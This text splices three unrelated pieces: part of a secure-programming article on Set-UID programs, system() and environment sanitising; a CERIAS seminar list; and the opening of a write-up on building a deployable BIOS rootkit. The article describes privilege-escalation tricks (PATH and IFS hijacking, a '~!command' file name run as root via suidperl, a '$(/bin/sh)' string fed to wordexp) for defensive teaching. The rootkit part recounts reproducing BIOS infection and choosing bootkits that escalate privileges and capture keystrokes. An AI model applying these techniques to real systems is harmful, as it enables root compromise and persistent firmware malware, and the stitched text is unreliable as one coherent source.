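 * returned; otherwise `out` is emptied and -1 is returned. */
int
resolve_in_path (const char * path_var, const char * name,
                 char * out, size_t out_size)
{
  const char * p = path_var;

  for (;;) {
    size_t len = strcspn (p, ":");
    int n;

    if (len == 0)
      n = snprintf (out, out_size, "./%s", name);
    else
      n = snprintf (out, out_size, "%.*s/%s", (int) len, p, name);

    /* The first directory holding an executable entry wins. */
    if (n > 0 && (size_t) n < out_size && access (out, X_OK) == 0)
      return 0;
    if (p[len] == '\0')
      break;
    p += len + 1;
  }
  if (out_size > 0)
    out[0] = '\0';
  return -1;
}
```

Whoever controls the list controls the result: with PATH set to “.”, the only candidate for mail is ./mail, which is exactly the script planted by the attacker.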

Of course, the first solution consists in giving the full path of the program, for instance /bin/mail. Then a new problem appears: the application relies on the system installation. While /bin/mail is usually available on every system, where is GhostScript, for instance (is it in /usr/bin, /usr/share/bin, /usr/local/bin)? Moreover, another type of attack becomes possible with some old shells: the use of the environment variable IFS. The shell uses it to split the command line into words; this variable holds the separators. The defaults are the space, the tab and the newline. If the user adds the slash /, the command “/bin/mail” is understood by the shell as “bin mail”. An executable file called bin in the current directory can then be executed just by setting PATH, as we have seen before, and this program runs with the application’s EUID.

Under Linux, the IFS environment variable is not a problem anymore since bash and pdksh both complete it with the default characters on startup. But keeping application portability in mind you must be aware that some systems might be less secure regarding this variable.

Some other environment variables may cause unexpected problems. For instance, the mail application allows the user to run a command while composing a message using the escape sequence “~!”. If the user writes the string “~!command” at the beginning of a line, the command is run. The program /usr/bin/suidperl, used to make perl scripts work with a Set-UID bit, calls /bin/mail to send a message to root when it detects a problem. Since /usr/bin/suidperl is Set-UID root, the call to /bin/mail is made with root’s privileges, and the message contains the name of the faulty file. A user can then create a file whose name contains a carriage return followed by a ~!command sequence and another carriage return. If a perl script calling suidperl fails on a low-level problem related to this file, a message is sent under the root identity, containing the escape sequence for the mail application, and the command in the file name is executed with root’s privileges.

This problem shouldn’t exist, since the mail program is not supposed to accept escape sequences when run automatically (not from a terminal). Unfortunately, an undocumented feature of this application (probably left over from debugging) allows the escape sequences as soon as the environment variable interactive is set. The result? A security hole easily exploitable (and widely exploited) in an application supposed to improve system security. The blame is shared. First, /bin/mail has an undocumented option that is especially dangerous since it allows code execution based solely on the data sent, which should be a priori suspicious for a mail utility. Second, even if the /usr/bin/suidperl developers were not aware of the interactive variable, they shouldn’t have left the execution environment as it was when calling an external command, especially when writing a Set-UID root program.

As a matter of fact, Linux ignores the Set-UID and Set-GID bits when executing scripts (read /usr/src/linux/fs/binfmt_script.c and /usr/src/linux/fs/exec.c). But some tricks allow you to bypass this rule, as Perl does with its own scripts, using /usr/bin/suidperl to take these bits into account.

Solutions

It isn’t always easy to find a replacement for the system() function. The first variant is to use functions of the exec family such as execl() or execle(). However, the result is quite different, since the external program is no longer called as a subroutine; instead, the invoked command replaces the current process. You must therefore fork the process and split the command line into arguments yourself. Thus the program :

  if (system ("/bin/lpr -Plisting stats.txt") != 0) {
    perror ("Printing");
    return (-1);
  }

becomes :

pid_t pid;
int   status;

if ((pid = fork()) < 0) {
  perror("fork");
  return (-1);
}
if (pid == 0) {
  /* child process */
  execl ("/bin/lpr", "lpr", "-Plisting", "stats.txt", NULL);
  perror ("execl");
  exit (-1);
}
/* parent process */
waitpid (pid, & status, 0);
if ((! WIFEXITED (status)) || (WEXITSTATUS (status) != 0)) {
  perror ("Printing");
  return (-1);
}

Obviously, the code gets heavier! In some situations, it becomes quite complex, for instance, when you must redirect the application standard input such as in :

system ("mail root < stat.txt");

That is, the redirection defined by < is done by the shell. You can do the same using a more complicated sequence such as fork(), open(), dup2(), execl(), etc. In that case, an acceptable solution would be to use the system() function, but only after configuring the whole environment.
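For reference, the fork(), open(), dup2(), exec sequence can be sketched as follows. This is an illustration under our own assumptions: run_with_stdin is a hypothetical helper, the environment it passes is a fixed minimal one chosen for the example, and the exit code 127 is used for every failure in the child, so it cannot be told apart from a command that itself exits with 127.

```c
#include <fcntl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Controlled environment handed to the command (assumed values). */
static char * const clean_env[] = {
  "PATH=/bin:/usr/bin",
  "IFS= \t\n",
  NULL
};

/* Runs `program` with arguments `argv`, its standard input read from
 * `stdin_path`, without involving a shell. Returns the exit status of
 * the command, or -1 if it could not be started or was killed. */
int
run_with_stdin (const char * program, char * const argv[],
                const char * stdin_path)
{
  int status;
  pid_t pid = fork ();

  if (pid < 0)
    return -1;
  if (pid == 0) {
    /* child: do by hand what the shell does for "< file" */
    int fd = open (stdin_path, O_RDONLY);
    if (fd < 0)
      _exit (127);
    if (dup2 (fd, STDIN_FILENO) < 0)
      _exit (127);
    if (fd != STDIN_FILENO)
      close (fd);
    execve (program, argv, clean_env);
    _exit (127);               /* only reached if execve() failed */
  }
  /* parent: wait for the command and report how it ended */
  if (waitpid (pid, & status, 0) < 0)
    return -1;
  return WIFEXITED (status) ? WEXITSTATUS (status) : -1;
}
```

The call system ("mail root < stat.txt") would then become run_with_stdin ("/bin/mail", args, "stat.txt") with args holding "mail", "root" and a terminating NULL. Neither PATH nor IFS as set by the user plays any part in it.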

Under Linux, the environment variables are available through a pointer to an array of strings: char ** environ. This array ends with NULL. The strings are of the form “NAME=value”.

We start by clearing the environment using the GNU extension :

    int clearenv (void);

or forcing the pointer

    extern char ** environ;

to take the NULL value. Next the important environment variables are initialized, using controlled values, with the functions :

    int setenv (const char * name, const char * value, int overwrite);
    int putenv (char * string);

before calling the system() function. For example :

    clearenv ();
    setenv ("PATH", "/bin:/usr/bin:/usr/local/bin", 1);
    setenv ("IFS", " \t\n", 1);
    system ("mail root < /tmp/msg.txt");

If needed, you can save the content of some useful variables before clearing the environment (HOME, LANG, TERM, TZ, etc.). The content, form and size of these variables must be strictly checked. It is important that you clear the whole environment before redefining the needed variables. The suidperl security hole wouldn’t have appeared if the environment had been properly cleared.
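Saving a variable across the cleanup takes some care, because the pointer returned by getenv() is no longer usable once the environment has been cleared. The sketch below keeps TERM only if it passes a strict check. The function names, the 32-character limit and the accepted character set are assumptions made for the example, and clearenv() is a glibc extension rather than a POSIX function.

```c
#define _DEFAULT_SOURCE        /* for clearenv() and setenv() on glibc */
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

#define TERM_MAX 32            /* arbitrary limit chosen for this sketch */

/* Accepts only short values made of letters, digits and "-_.+". */
static int
term_is_acceptable (const char * s)
{
  size_t i, len = strlen (s);

  if (len == 0 || len > TERM_MAX)
    return 0;
  for (i = 0; i < len; i ++)
    if (! isalnum ((unsigned char) s[i]) && strchr ("-_.+", s[i]) == NULL)
      return 0;
  return 1;
}

/* Clears the environment, then sets PATH and IFS to controlled values
 * and restores TERM if it was acceptable. Returns 0 on success. */
int
sanitize_environment (void)
{
  char term[TERM_MAX + 1] = "";
  const char * value = getenv ("TERM");

  /* copy first: the string belongs to the environment we are about
   * to discard */
  if (value != NULL && term_is_acceptable (value))
    strcpy (term, value);

  if (clearenv () != 0)
    return -1;
  if (setenv ("PATH", "/bin:/usr/bin", 1) != 0)
    return -1;
  if (setenv ("IFS", " \t\n", 1) != 0)
    return -1;
  if (term[0] != '\0' && setenv ("TERM", term, 1) != 0)
    return -1;
  return 0;
}
```

A Set-UID program would call sanitize_environment () before any call to system() or popen(), and give up if it returns -1.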

By analogy, protecting a machine on a network first implies denying every connection. Next, a sysadmin activates the required or useful services. In the same way, when programming a Set-UID application, the environment must be cleared and then filled with the required variables.

Verifying a parameter is done by comparing its value to the allowed formats. If the comparison succeeds, the parameter is validated. Otherwise, it is rejected. If you instead run the test against a list of invalid formats, the risk of letting a malformed value through increases, and that can be a disaster for the system.
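As an illustration of checking against what is allowed rather than what is forbidden, here is a sketch validating a user name before it is handed to an external command. The accepted format (a lowercase letter or underscore, followed by lowercase letters, digits, underscores or hyphens, 32 characters at most) is an assumption for the example, and user_name_is_valid is a hypothetical helper.

```c
#include <string.h>

#define USER_NAME_MAX 32       /* arbitrary limit chosen for this sketch */

/* Returns 1 if `name` matches the allowed format, 0 otherwise.
 * Anything not explicitly allowed is rejected. */
int
user_name_is_valid (const char * name)
{
  static const char first[] = "abcdefghijklmnopqrstuvwxyz_";
  static const char rest[]  = "abcdefghijklmnopqrstuvwxyz0123456789_-";
  size_t len;

  if (name == NULL)
    return 0;
  len = strlen (name);
  if (len == 0 || len > USER_NAME_MAX)
    return 0;
  if (strchr (first, name[0]) == NULL)
    return 0;
  /* every character must belong to the allowed set */
  return strspn (name, rest) == len;
}
```

A test built the other way round, rejecting only “;”, “$” or “`”, would have to anticipate every dangerous character; here a value such as “$(sh)” or “-rf” is refused simply because it is not in the allowed format.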

We must understand that what is dangerous with system() is also dangerous for derived functions such as popen(), and for library functions such as execlp() or execvp(), which take the PATH variable into account.

Indirect execution of commands

To improve a program’s usability, it’s tempting to let the user configure most of the software’s behavior, using macros for instance. To manage variables or generic patterns as the shell does, there is a powerful function called wordexp(). You must be very careful with it, since passing it a string like $(command) executes the mentioned external command. Giving it the string “$(/bin/sh)” starts a shell with the privileges of the Set-UID program. To avoid this, wordexp() accepts a flag called WRDE_NOCMD that disables the interpretation of the $( ) sequence.
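A minimal sketch of a call with WRDE_NOCMD follows. When the flag is set and the string contains a command substitution, wordexp() fails with the error WRDE_CMDSUB instead of running anything. The wrapper expand_without_commands and its return conventions are ours.

```c
#include <stdio.h>
#include <wordexp.h>

/* Expands `input` as the shell would, with command substitution
 * disabled. Each resulting word is printed to `out` when it is not
 * NULL. Returns the number of words, -2 if the input tried to use
 * command substitution, -1 for any other error. */
int
expand_without_commands (const char * input, FILE * out)
{
  wordexp_t words;
  size_t i;
  int count;
  int rc = wordexp (input, & words, WRDE_NOCMD);

  if (rc == WRDE_CMDSUB)
    return -2;
  if (rc != 0)
    return -1;

  for (i = 0; i < words.we_wordc; i ++)
    if (out != NULL)
      fprintf (out, "%s\n", words.we_wordv[i]);

  count = (int) words.we_wordc;
  wordfree (& words);
  return count;
}
```

Variables and wildcards are still expanded, so the values a user can reach this way (environment variables, file names) deserve the same scrutiny as any other input.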

When invoking external commands, you must be careful not to call a utility providing an escape mechanism to a shell (like the vi :!command sequence). It’s difficult to list them all: some applications are obvious (text editors, file managers…), others are harder to detect (as we have seen with /bin/mail) or have dangerous debugging modes.

Conclusion

This article illustrates several points :

  • Everything external to a Set-UID root program must be validated! This means the environment variables as well as the parameters given to the program (command line, configuration file…);
  • Privileges have to be reduced as soon as the program starts and should only be increased very briefly and only when absolutely necessary;
  • “Security in depth” is essential : every protective measure a program takes helps reduce the number of people who can compromise it.

The next article will talk about memory, its organization, and function calls before moving on to buffer overflows. We will also see how to build a shellcode.

CERIAS Security Seminar Archive Video Talks 2010-2011-2012-2013-2014-2015


01/14/2015

Learning from Information Security Maturity: A Textual Analysis

Jackie Rees Ulmer – Purdue University

01/21/2015

Security with Privacy - A Research Agenda

Bharath Samanthula – Purdue University

01/28/2015

Practical Confidentiality Preserving Big Data Analysis in Untrusted Clouds

Savvas Savvides – Purdue University

02/04/2015

Regulatory Compliance Checking Over Encrypted Audit Logs

Omar Chowdhury – Purdue University

02/11/2015

Code-Pointer Integrity

Mathias Payer – Purdue University

02/18/2015

Privacy Notions for Data Publishing and Analysis

Ninghui Li – Purdue University

02/25/2015

Software updates: decisions and security implications

Kami Vaniea – Indiana University

03/04/2015

Aiding Security Analytics -- From Dempster-Shafer Theory to Anthropology

Xinming Ou – Kansas State University

03/11/2015

Virtual Android Malware Detection and Analysis (VAMDA)

Andrew Pyles – MITRE

03/25/2015

Symposium/Michelle Dennedy, Intel

Michelle Dennedy – Intel

04/01/2015

Breaking Mobile Social Networks for Automated User Location Tracking

Kui Ren – University at Buffalo

04/15/2015

Engineering Secure Computation -- Efficiently

Yan Huang – Indiana University


01/15/2014

Open

01/22/2014

Cancelled

01/29/2014

Secure and Private Outsourcing to Untrusted Cloud Servers

Shumiao Wang – Purdue University

02/05/2014

Cancelled

02/19/2014

Technical Tradeoffs in the NSA's Mass Phone Call Program

Ed Felten – Princeton University

03/05/2014

Machine Intelligence for Biometric and On-Line Security

Marina Gavrilova – University of Calgary

03/12/2014

General-Purpose Secure Computation and Outsourcing

Marina Blanton – University of Notre Dame

04/02/2014

CERIAS Poster Contest Winners

Philip Ritchey & Mohammed Almeshekah – Purdue University

04/16/2014

Online Privacy Agreements, is it Informed Consent?

Masooda Bashir – University of Illinois at Urbana-Champaign

04/23/2014

Cancelled

04/30/2014

Women In Cyber Security

Rachel Sitarz – Purdue University

08/27/2014

Tree-based Oblivious RAM and Applications

Elaine Shi – University of Maryland

09/10/2014

WarGames in Memory: Fighting Powerful Attackers

Mathias Payer – Purdue University

09/24/2014

Threat intelligence and digital forensics

Sam Liles – Purdue University

10/08/2014

Biometrics and Usability

Stephen Elliott – Purdue University

10/15/2014

Cancelled

10/22/2014

“Memory Analysis, Meet GPU Malware”

Golden G. Richard III – University of New Orleans

10/29/2014

Healthcare Security and Privacy: Not There Yet

Robert Zimmerman – Inforistec

11/05/2014

Improving Analyst Team Performance and Capability in NOC / SOC Operations Centers

Barrett Caldwell and Omar Eldardiry – Purdue University

11/19/2014

Privacy in the Age of the Police State

Marcus Ranum – Tenable Network Security

12/03/2014

Open

12/10/2014

How Program Analysis can be Used in Security Applications

Xiangyu Zhang – Purdue University


01/09/2013

Open

01/23/2013

Differentially Private Publishing of Geospatial Data

Wahbeh Qardaji – Purdue University

01/30/2013

A Semantic Baseline for Spam Filtering

Christian F. Hempelmann – Texas A&M University-Commerce

02/06/2013

Using Probabilistic Generative Models for Ranking Risks of Android Apps

Chris Gates – Purdue University

02/20/2013

Minimizing Private Data Disclosures in the Smart Grid

Weining Yang – Purdue University

02/27/2013

Protecting Today’s Enterprise Systems against Zero-day Attacks

Saurabh Bagchi – Purdue University

03/06/2013

Whole Genome Sequencing: Innovation Dream or Privacy Nightmare?

Emiliano DeCristofaro – PARC

03/20/2013

Active Cyber Network Defense with Denial and Deception

Kristin Heckman – MITRE

03/27/2013

Regulatory Compliance Software Engineering

Aaron Massey – Georgia Tech

04/03/2013

Symposium

04/17/2013

Towards Automated Problem Inference from Trouble Tickets

Rahul Potharaju – Purdue University

04/24/2013

Identity-Based Internet Protocol Network

David Pisano – MITRE

08/21/2013

New possibilities of steganography based on Kuznetsov-Tsybakov problem

Jarek Duda – Purdue University

08/28/2013

Information Security Challenges in an Academic Environment

Keith Watson – Purdue University

09/11/2013

Cyber Threats and the Cyber Kill Chain

Kevin Brennan – FBI

09/18/2013

Protecting a billion identities without losing (much) sleep

Mark Crosbie, Tim Tickel, Four Flynn – Facebook

10/02/2013

Open

10/09/2013

Open

10/16/2013

Open

10/23/2013

Systems of Systems: Opportunities and Challenges

Daniel DeLaurentis – Purdue University

10/30/2013

Membership Privacy: A Unifying Framework For Privacy Definitions

Ninghui Li – Purdue University

11/06/2013

Yahoo! Messenger Forensics on Windows Vista and Windows 7

Tejashree Datar – Purdue University

11/13/2013

Cloud Security: How Does Software Assurance Apply

Randall Brooks – Raytheon

11/20/2013

Trust Management for Publishing Graph Data

Muhammad Umer Arshad – Purdue University

12/04/2013

Economic Policy and Cyber Challenges in Estonia

Marina Kaljurand


01/11/2012

“Introduction to Biometrics”

Stephen Elliott – Purdue University

01/18/2012

Secure Provenance Transmission for Data Streams

Salmin Sultana – Purdue University

01/25/2012

A Flexible System for Access Control

Frank Tompa – University of Waterloo

02/01/2012

Is it time to add Trust to the Future Internet/Web?

George Vanecek – Futurewei Technologies

02/15/2012

Forensic Carving of Network Packets with bulk_extractor and tcpflow

Simson Garfinkel – Naval Postgraduate School

02/22/2012

Vulnerability Path and Assessment

Ben Calloni – Lockheed Martin

02/29/2012

Cryptographic protocols in the era of cloud computing

Nishanth Chandran – Microsoft Research

03/07/2012

Privacy-Preserving Assessment of Location Data Trustworthiness

Chenyun Dai – Purdue University

03/21/2012

Adding a Software Assurance Dimension to Supply Chain Practices

Randall Brooks – Raytheon

04/04/2012

J.R. Rao, IBM Research

J.R. Rao – IBM

04/11/2012

K-Anonymity in Social Networks: A Clustering Approach

Traian Truta – Northern Kentucky University

04/25/2012

A Practical Beginners' Guide to Differential Privacy

Christine Task – Purdue University

08/22/2012

The New Frontier, Welcome the Cloud Brokers

Scott Andersen – Lockheed Martin

08/29/2012

Challenges for R&D in the Security Field

Lewis Shepherd – Microsoft

09/05/2012

The Inertia of Productivity

Ed Lopez

09/12/2012

Trends in cyber security consulting

Sharon Chand & Chad Whitman – Deloitte & Touche

10/03/2012

Defending Users Against Smartphone Apps: Techniques and Future Directions

William Enck – North Carolina State University

10/10/2012

Understanding Spam Economics

Understanding Spam Economics

Chris Kanich – University of Illinois at Chicago
(445.1MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/17/2012

The Boeing Company

The Boeing Company

Edmund Jones – Boeing
(443.0MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

10/31/2012

Risk perception of information security risks online

Risk perception of information security risks online

Vaibhav Garg – Indiana University
(446.6MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/07/2012

Publishing Microdata with a Robust Privacy Guarantee

Publishing Microdata with a Robust Privacy Guarantee

Jianneng Cao – Purdue University
(444.5MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

11/28/2012

A New Class of Buffer Overflow Attacks

A New Class of Buffer Overflow Attacks

Ashish Kundu – IBM
(316.8MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube

12/05/2012

You are Anonymous!!! Then you must be Lucky

You are Anonymous!!! Then you must be Lucky

Bilal Shebaro – Purdue University
(220.7MB): Video Icon MP4 Video   Flash Icon Flash Video   Watch on Youtube


01/12/2011

Risk Perception and Trust in Cloud

Fariborz Farahmand – Purdue University

01/19/2011

Retrofitting Legacy Code for Security

Somesh Jha – University of Wisconsin

02/02/2011

Campus closed/snow

02/09/2011

Understanding insiders: An analysis of risk-taking behavior *

Fariborz Farahmand – Purdue University

02/16/2011

Malware Trends and Techniques

Tom Ervin – MITRE

02/23/2011

A couple of results about JavaScript

Jan Vitek – Purdue University

03/02/2011

“Modeling DNS Security: Misconfiguration, Availability, and Visualization”

Casey Deccio – Sandia National Labs

03/09/2011

Exploiting Banners for Fun and Profits

Michael Schearer – Booz Allen Hamilton

04/06/2011

Society, Law Enforcement and the Internet: Models for Give and Take

Carter Bullard – QoSient, LLC

04/13/2011

FuzzyFusion™, an application architecture for multisource information fusion

Ronda R. Henning – Harris Corporation

04/27/2011

Mobile Phones and Evidence Preservation

Eric Katz – Purdue University

08/24/2011

Provisioning Protocol Challenges in an Era of gTLD Expansion

Scott Hollenbeck – Verisign

08/31/2011

Non-homogeneous anonymizations

Tamir Tassa – The Open University, Israel

09/07/2011

Detecting Bots in Online Games using Human Observational Proofs

Steven Gianvecchio – MITRE

09/21/2011

Methods and Techniques for Protecting Data in Real Time on the Wire

Joe Leonard – Global Velocity

09/28/2011

Weighted Multiple Secret Sharing

Xukai Zou – Indiana University-Purdue University Indianapolis

10/05/2011

Trusted Computing and Security for Embedded Systems

Hal Aldridge – Sypris Electronics

10/12/2011

Enterprise-Wide Intrusions Involving Advanced Threats

Dan McWhorter and Steve Surdu – Mandiant Corporation

10/19/2011

Ontological Semantic Technology Goes Phishing

Julia M. Taylor, Victor Raskin, and Eugene H. Spafford – Purdue University

11/16/2011

Jam me if you can: Mitigating the Impact of Inside Jammers

Loukas Lazos – University of Arizona

11/30/2011

Soundcomber: A Stealthy and Context-Aware Sound Trojan for Smartphones

Apu Kapadia – Indiana University

12/07/2011

No Seminar


01/13/2010

“Thinking Outside the Box”

Eugene Spafford – Purdue University

01/20/2010

Applications of biometric technologies

Stephen Elliott – Purdue University

01/27/2010

Fast-flux Attacks

Shijie Zhou – University of Electronic Science and Technology of China

02/03/2010

Detecting Insider Theft of Trade Secrets

Greg Stephens – Mitre

02/10/2010

Dissecting Digital Data: Context & Meaning through Analytics

Marcus Rogers – Purdue University

02/17/2010

Provenance-based Data Trustworthiness Assessment in Data Streams

Hyo-Sang Lim – Purdue University

03/10/2010

Making of the CWE Top-25, 2010 Edition

Pascal Meunier – Purdue University

04/07/2010

60 years of scientific research in cryptography: a reflection

Yvo Desmedt – University College London, UK

04/14/2010

Security of JavaScript in a Browser Environment

Christian Hammer – Purdue University

04/21/2010

The role of System Security Engineering in the engineering lifecycle

Stephen Dill – Lockheed Martin

04/28/2010

“Ontological Semantic Technology for Detecting Insider Threat and Social Engineering”

Victor Raskin & Julia Taylor – Purdue University

08/25/2010

Secure Network Coding for Wireless Mesh Networks

Cristina Nita-Rotaru – Purdue University

09/01/2010

Data in the Cloud: Authentication Without Leaking

Ashish Kundu – Purdue University

09/08/2010

Rootkits

Xeno Kovah – MITRE

09/22/2010

Security of Mobile Ad Hoc Networks (MANETs)

Petros Mouchtaris – Telcordia

09/29/2010

Assured Processing through Obfuscation

Sergey Panasyuk – Air Force Research Laboratory

10/06/2010

Global Study of Web 2.0 Use in Organizations

Mihaela Vorvoreanu, Lorraine G. Kisselburgh – Purdue University

10/20/2010

Trust and Protection in the Illinois Browser Operating System

Sam King – University of Illinois

10/27/2010

The role of automata theory in software verification

P. Madhusudan – University of Illinois at Urbana-Champaign

11/03/2010

Tackling System-Wide Integrity

Trent Jaeger – Pennsylvania State

11/10/2010

Detecting Coordinated Attacks with Traffic Analysis

Nikita Borisov – University of Illinois at Urbana-Champaign

11/17/2010

Security Applications for Physically Unclonable Functions

Michael Kirkpatrick – Purdue University

12/01/2010

Nudging the Digital Pirate: Behavioral Issues in the Piracy Context

Matthew Hashim – Purdue University

BIOS Based Rootkits



This research is published purely for educational purposes. It is the work of Exfiltrated.com [and not of CyberPunk in any way]; many thanks and all credit go to them. Please take the time to visit their page and support the researchers.

Approach

Currently there is a very limited amount of sample code available for the creation of BIOS rootkits, with the only publicly available code being released along with the initial BIOS rootkit demonstration in March of 2009 (as far as I’m aware). My first goal was to reproduce the findings made by Core Security in 2009, and then my second task was to investigate how I could extend their findings. My ultimate goal was to create some sort of BIOS based rootkit which could easily be deployed.

In 2009 research was also being done in a related area of security: boot sector based rootkits. Unlike BIOS based rootkits, developments in this area have progressed rapidly, which has led to a number of different master boot record (MBR) based rootkits being developed and released. This type of rootkit was termed a “Bootkit”, and like a BIOS based rootkit it aims to load itself before the OS is loaded. This similarity led a number of bootkit developers to remark that it should be possible to perform this type of attack directly from the BIOS instead of loading from the MBR. Despite these comments and suggestions, no examples of such code have yet been made public.

The first stage of this project was to set up a test and development environment where BIOS modifications could be made and debugged. In their paper on Persistent BIOS Infection, Sacco and Ortega detail how they discovered that VMware contains a BIOS ROM as well as a GDB server which can be used for debugging applications starting from the BIOS itself. After getting everything going successfully in VMware, work was done to port the VMware BIOS modifications to other similar BIOSes; that work is described in the second half of this write-up.


VMware BIOS Configuration

OK, enough background; on to actually doing it!

The first step is to extract the BIOS from VMware itself. In Windows, this can be done by opening the vmware-vmx.exe executable with any resource extractor, such as Resource Hacker. There are a number of different binary resources bundled into this application, and the BIOS is stored in resource ID 6006 (at least in VMware 7). In other versions this may be different, but the key thing to look for is the resource that is 512 KB in size. The following image shows what this looks like in Resource Hacker:

[Screenshot: the BIOS resource shown in Resource Hacker]

While this BIOS image is bundled into the vmware-vmx.exe application, it is also possible to use it separately, without the need to patch it back into the VMware executable after each change. VMware allows a number of “hidden” options to be specified in an image’s VMX settings file. At some point I plan to document a bunch of them on the Tools page of this website, because some really are quite useful! The ones which are useful for BIOS modification and debugging are the following:

bios440.filename = "BIOS.ROM"
debugStub.listen.guest32 = "TRUE"
debugStub.hideBreakpoint = "TRUE"
monitor.debugOnStartGuest32 = "TRUE"

The first setting allows the BIOS ROM to be loaded from a file instead of from the vmware-vmx application directly. The following two lines enable the built-in GDB server, which listens for connections on port 8832 whenever the image is running. The last line instructs VMware to halt execution at the first instruction of the guest image’s BIOS. This is very useful as it allows breakpoints to be defined and memory to be examined before any BIOS execution takes place. Testing was done using IDA Pro as the GDB client, and an example of the VMware guest image halted at the first BIOS instruction can be seen in the screenshot below:

[Screenshot: IDA Pro attached to the VMware guest, halted at the first BIOS instruction]
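As a quick sanity check before launching the guest, the settings above can be confirmed programmatically. The following is a minimal Python 3 sketch and is not part of the original tooling: the helper names `parse_vmx` and `missing_debug_settings` are hypothetical, and it assumes the VMX file is plain `key = "value"` text in which lines starting with `#` are comments.

```python
# Sketch only: check that a VMX file contains the BIOS debugging options
# discussed above. Helper names are hypothetical; the file format is assumed
# to be simple `key = "value"` lines.

EXPECTED = {
    "bios440.filename": "BIOS.ROM",
    "debugStub.listen.guest32": "TRUE",
    "debugStub.hideBreakpoint": "TRUE",
    "monitor.debugOnStartGuest32": "TRUE",
}


def parse_vmx(text):
    """Return a dict of settings parsed from VMX-style text."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blank lines, comment lines, and anything without '='.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def missing_debug_settings(settings, expected=EXPECTED):
    """List expected keys that are absent or set to a different value."""
    return sorted(k for k, v in expected.items() if settings.get(k) != v)


# Example input with one of the four options deliberately left out.
SAMPLE_VMX = '''
displayName = "bios-test"
bios440.filename = "BIOS.ROM"
debugStub.listen.guest32 = "TRUE"
monitor.debugOnStartGuest32 = "TRUE"
'''

if __name__ == "__main__":
    print(missing_debug_settings(parse_vmx(SAMPLE_VMX)))
```

With the sample text above, the only setting reported as missing is `debugStub.hideBreakpoint`.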

When initially using this test environment, there were significant issues with IDA’s connection to the GDB server. After much trial and error and testing with different GDB clients, it was determined that the version of VMware was to blame. Versions 6 and 6.5 do not appear to work very well with IDA, so VMware version 7 was used for the majority of the testing. The BIOS consists of 16 bit code, not the 32 bit code that IDA defaults to, so defining “Manual Memory Regions” in the debugging options of IDA was necessary. This allowed memory addresses to be defined as 16 bit code so that they would disassemble properly.

Recreating Past Results – VMware BIOS Modification

As noted already, Sacco & Ortega have done two presentations on BIOS modification, and Wojtczuk & Tereshkin have also done a presentation regarding BIOS modification. Of these three presentations, only Sacco & Ortega included any source or sample code which demonstrated their described techniques. Since this was the only existing example available, it was used as the starting point for this BIOS based rootkits project.

The paper by Sacco & Ortega is fairly comprehensive in describing their setup and testing techniques. The VMware setup was completed as described above, and the next step was to implement the BIOS modification code which they had provided. That code required the BIOS ROM to be extracted into individual modules. The BIOS ROM included with VMware is a Phoenix BIOS. Research showed that there were two main tools for working with this type of BIOS: an open source tool called “phnxdeco”, and a commercial tool called “Phoenix BIOS Editor”, which is provided directly by Phoenix. The paper by Sacco & Ortega recommended the Phoenix BIOS Editor application, and they had designed their code to make use of it. A trial version was downloaded from the internet, and it appears to have all of the functionality necessary for this project. Looking for a download link again, I can’t find anything that seems even half legitimate, but Google does come up with all kinds of links. I’ll just assume that it should still be fairly easy to track down some sort of legitimate trial version. Once the tools are installed, the next step is to build a custom BIOS.

I first tested that a minor modification to the BIOS image would take effect in VMware, which it did (I changed the VMware logo colour). Next, I ran the Python build script provided by Sacco & Ortega for the BIOS modification. Aside from one typo in the Python BIOS assembly script, everything worked and a new BIOS was saved to disk. Loading this BIOS in VMware, however, was not as successful: VMware displayed a message that something had gone horribly wrong in the virtual machine and that it was being shut down. Debugging of this issue was done in IDA and GDB, but the problem was difficult to trace (plus there were version issues with IDA). In an effort to get things working quickly, a different version of VMware was loaded so that the test environment would match that of Sacco & Ortega. After some searching, the exact version of VMware that they had used was located and installed. Unfortunately this still did not solve the issue; the same crash error was reported by VMware. While I had seen this BIOS modification work when demonstrated as part of their presentation, it was now clear that their example code would require additional modification before it could work on any test system.

Many different things were learned as a result of debugging Sacco & Ortega’s code, and eventually the problem was narrowed down to an assembler instruction which executed a far call to an absolute address that was not correct for the BIOS being used. With the correct address entered, the BIOS code executed successfully, and the rootkit began searching the hard drive for files to modify. This code took a very long time to scan the hard drive (which was only 15 GB), and it was run multiple times before the system would start. The proof of concept code included the functionality to patch notepad.exe so that it would display a message when started, or to modify the /etc/passwd file on a Unix system so that the root password would be set to a fixed value. This showed that the rootkit can function on both Windows and Linux systems, even if only used for simple purposes.

Bootkit Testing

While this happened significantly later in the project timeline, a number of existing bootkits were also tested, and their results recreated, to determine which would work best not just as a bootkit but also as a BIOS based rootkit. Four different bootkits were examined: Stoned, Whistler, Vbootkit and Vbootkit2. The Stoned and Whistler bootkits were designed to function much more like malware than a rootkit, and did not have a simple source code structure.

The Vbootkit2 bootkit was much different, as it was not designed to be malware and had (relatively) well documented source code. This bootkit was designed to be run from a CD, but had only been tested with Windows 7 beta. When used with Windows 7 retail, the bootkit simply did not load, as different file signatures were used by Windows. Some time was spent determining the new file signatures so that this bootkit could be tested, but it would still not load successfully. To allow for testing, a beta copy of Windows 7 was obtained instead. When the Vbootkit2 software was run on a Windows 7 beta system, everything worked as expected. The Vbootkit2 software included the ability to escalate a process to System (above admin) level privileges, to capture keystrokes, and to reset user passwords. These were all items that would be valuable to have in a rootkit, but significant work remained to port this application to Windows 7 retail.

The Vbootkit software was examined next; it was designed to work with Windows 2003, XP and 2000. While it was not packaged so that it could be run from CD, only minor modifications were required to add that functionality. This software only included the ability to escalate process privileges, but that alone is a very valuable function. This bootkit software was chosen for use with the BIOS rootkit, which is described in the next section.

NVLabs (http://www.nvlabs.in/) are the authors of the bootkit itself, which in many ways represents the main functionality of this project, so a big thanks to them for making their code public! It appears their source code is no longer available on their website, but it can still be downloaded from Archive.org here.

BIOS Code Injection

The proof of concept code by Sacco & Ortega which was previously tested was very fragile, and its functions were not the type of actions that a rootkit should be performing. The first step in developing a new rootkit was to develop a robust method of having the BIOS execute additional code.

